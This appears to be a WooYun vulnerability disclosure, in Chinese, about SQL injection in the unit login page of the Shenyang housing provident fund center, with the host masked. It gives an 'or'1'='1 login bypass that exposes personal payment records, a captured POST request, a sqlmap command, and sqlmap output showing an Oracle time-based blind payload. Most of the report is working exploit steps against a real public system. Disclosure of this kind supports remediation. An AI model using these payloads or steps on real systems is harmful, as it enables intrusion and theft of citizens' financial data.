WooYun.org

1.沈阳市住房公积金管理中心漏洞地址

http://**.**.**.**:8080/cxxt/unit/loginunit.jsp

2.单位公积金用户名和密码处输入拼接语句'or'1'='1 可以成功登录并获取个人缴费信息。
3.利用burpsuite抓包获取数据，保存至D盘2.txt
POST /cxxt/unitGjjAction/queryByUnitGjjAction.action HTTP/1.1
Host: **.**.**.**:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**:8080/cxxt/unit/loginunit.jsp
Cookie: JSESSIONID=YqlcWCpG2Qmk5sjjMgdhN49JQGJd81VP2GCfYRZ21LvX1gT25vpC!-2123065685; _gscu_1721107908=514006744p6mcs24; _gscs_1721107908=51400674gnozxg24|pv:7; _gscbrs_1721107908=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
userName=123*&password=456*&randUnit=qkczec&submit=%E6%8F%90%E4%BA%A4
4.利用sqlmap进行注入测试，获取数据库类型为Oracle，注入类型为POST，命令为sqlmap.py -r d:\2.txt --risk=3 -v 3 --dbs
sqlmap identified the following injection points with a total of 271 HTTP(s) req
uests:
---
Parameter: #1* ((custom) POST)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: userName=123' AND 7178=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(115)|
|CHR(70)||CHR(97),5) AND 'jSje'='jSje&password=456&randUnit=qkczec&submit=%E6%8F
%90%E4%BA%A4
Vector: AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAG
E('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)
---
[23:05:20] [INFO] the back-end DBMS is Oracle
web application technology: Servlet 2.5, JSP 2.1
back-end DBMS: Oracle
---------以上点能够获取信息，说明该处存在注入点，亲，赶紧修复一下吧----------